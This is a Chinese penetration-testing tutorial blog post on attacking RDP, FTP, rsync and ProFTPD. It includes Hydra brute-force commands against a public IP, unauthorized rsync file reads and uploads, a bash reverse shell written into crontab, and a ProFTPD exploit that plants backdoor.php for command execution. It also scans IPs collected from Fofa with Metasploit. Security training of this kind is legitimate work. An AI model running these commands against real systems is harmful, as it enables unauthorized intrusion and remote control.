- 🍬 博主介绍
-
- 👨🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
- ✨主攻领域:【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】
- 🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
- 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
- 🙏作者水平有限,欢迎各位大佬指点,相互学习进步!
-
目录

1、服务攻防-远程控制&文件传输等
2、远程控制-RDP&RDP&弱口令&漏洞
3、文件传输-FTP&Rsync&弱口令&漏洞
- #章节内容:
- 常见服务应用的安全测试:
- 1、配置不当-未授权访问
- 2、安全机制-特定安全漏洞
- 3、安全机制-弱口令爆破攻击
-
- #前置知识:
- 应用服务安全测试流程:见图
- 1、判断服务开放情况-端口扫描&组合应用等
- 2、判断服务类型归属-数据库&文件传输&通讯等
- 3、判断服务利用方式-特定漏洞&未授权&弱口令等
-
Hydra爆破工具:
GitHub - vanhauser-thc/thc-hydra: hydra
但是我们平常做渗透测试爆破口令之类的都直接在kali里面使用,kali自带很多工具,下面这个是一个很强大的爆破字典:
GitHub - TheKingOfDuck/fuzzDicts: Web Pentesting Fuzz 字典,一个就够了。
- hydra是一个自动化的爆破工具,暴力破解弱密码,
- 是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可
- -s PORT 可通过这个参数指定非默认端口。
- -l LOGIN 指定破解的用户,对特定用户破解。
- -L FILE 指定用户名字典。
- -p PASS 小写,指定密码破解,少用,一般是采用密码字典。
- -P FILE 大写,指定密码字典。
- -e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
- -C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
- -M FILE 指定目标列表文件一行一条。
- -o FILE 指定结果输出文件。
- -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
- -t TASKS 同时运行的线程数,默认为16。
- -w TIME 设置最大超时的时间,单位秒,默认是30s。
- -v / -V 显示详细过程。
- server 目标ip
- service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。
- 例子:
- FTP:文件传输协议
- RDP:Windows远程桌面协议
- SSH:Linux安全外壳协议
-
-
- ftp爆破:hydra -L test -P 10top1K.txt 47.110.53.159 ftp -V
- ssh爆破:hydra -l root -P 10top1K.txt 47.110.53.159 ssh -V
- rdp爆破:hydra -l administrator -P 10top1K.txt 47.110.53.159 rdp -V
-
- 字典:fuzzDicts-master项目
爆破rdp密码:


利用ftp自动化部署工具,部署一个ftp,利用hydra进行爆破

ftp爆破最大的特点是账号密码都不确定,账号密码都需要使用字典
这里由于节省时间,直接告诉他账号,真是环境账号密码都需要利用字典

rsync 文件传输协议-linux 端口873
配置不当会造成未授权访问。没有配置ACL或者访问密码,可以读取目标服务器文件
靶场环境地址:

判断是否有该漏洞的方法:
- ┌──(root💀kali)-[~/桌面]
- └─# rsync rsync://123.58.224.8:52334

利用读取文件,拿到flag
- ┌──(root💀kali)-[~/桌面]
- └─# rsync rsync://123.58.224.8:52334/src
-
- ┌──(root💀kali)-[~/桌面]
- └─# rsync rsync://123.58.224.8:52334/src/tmp/ #这里tmp目录后面一定要接/,要不然flag找不到
-


上次文件:
- ┌──(root💀kali)-[~/桌面]
- └─# rsync -av kali.png rsync://123.58.224.8:21419/src/tmp/kali.png
- sending incremental file list
- kali.png
-
- sent 512,846 bytes received 35 bytes 341,920.67 bytes/sec
- total size is 512,626 speedup is 1.00
-
- ┌──(root💀kali)-[~/桌面]
- └─# rsync rsync://123.58.224.8:21419/src/tmp/
- drwxrwxrwt 4,096 2024/04/23 22:51:30 .
- -rw-r--r-- 0 2024/04/23 22:44:18 flag-{bmhad0ff7c7-f192-4388-bba9-1911279ec5a9}
- -rwxrw-rw- 512,626 2024/04/19 04:24:19 kali.png
-

反弹shell:
先把/etc/crontab进程任务下载到本地当前目录下

写个反弹shell:
- #!/bin/bash
- /bin/bash -i >& /dev/tcp/10.10.10.128/9999 0>&1

详细步骤如下:

kali提前进行反弹shell监听,

由于我这个使用的是在线的靶场环境,所以时间不够,师傅们可以使用本地docker启动环境,具体参考文章如下:
Vulhub - Docker-Compose file for vulnerability environment
Fofa_Viewer是一个简单易用的fofa客户端,由 WgpSec狼组安全团队 f1ashine 师傅主要开发。程序使用 JavaFX 编写,便于跨平台使用,相比与web端的方式查询,其启动与搜索速度都有比较明显的提升!接下来介绍一下如何使用吧!
- # JDK8 版本
- 链接:https://pan.baidu.com/s/1Tq4v04d4Axoun4SYo2JCew
- 提取码:lnke
- # JDK11 以及更高的 Java 版本
- 链接:https://pan.baidu.com/s/1TwjkvCdIYuOn6_TByojkRQ
- 提取码:0uob
输入下面的命令以后,需要我们手动修改如下的配置:
java -jar fofaviewer.jar

小迪的查询结果:

配合msfconsole
我这里随机把小迪的一些IP来测试,保存在ip.list文件中

然后我们再在kali上打开MSF

- msf6 > use auxiliary/scanner/rsync/modules_list
- msf6 auxiliary(scanner/rsync/modules_list) > show options
- Module options (auxiliary/scanner/rsync/modules_list):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:
' - RPORT 873 yes The target port (TCP)
- TEST_AUTHENTICATION true yes Test if the rsync module requires authentication
- THREADS 1 yes The number of concurrent threads (max one per host)
- msf6 auxiliary(scanner/rsync/modules_list) > set rhosts file:/root/桌面/ip.list
- rhosts => file:/root/桌面/ip.list
- msf6 auxiliary(scanner/rsync/modules_list) > set threads 10
- threads => 10

run一下,
[+]号代表有该漏洞

为了确认是否正确,这里开一台靶机测试,扫描后发现成功发现了。


proftpd 是linux软件启动ftp服务
ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。
靶场环境:

访问漏洞地址,是个apache页面

我们使用官网的exp进行执行命令:

执行下面的命令
python exploit.py --host 123.58.224.8 --port 42907 --path "/var/www/html/"
然后访问/backdoor.php?cmd=whoami,就可以进行任意命令执行了

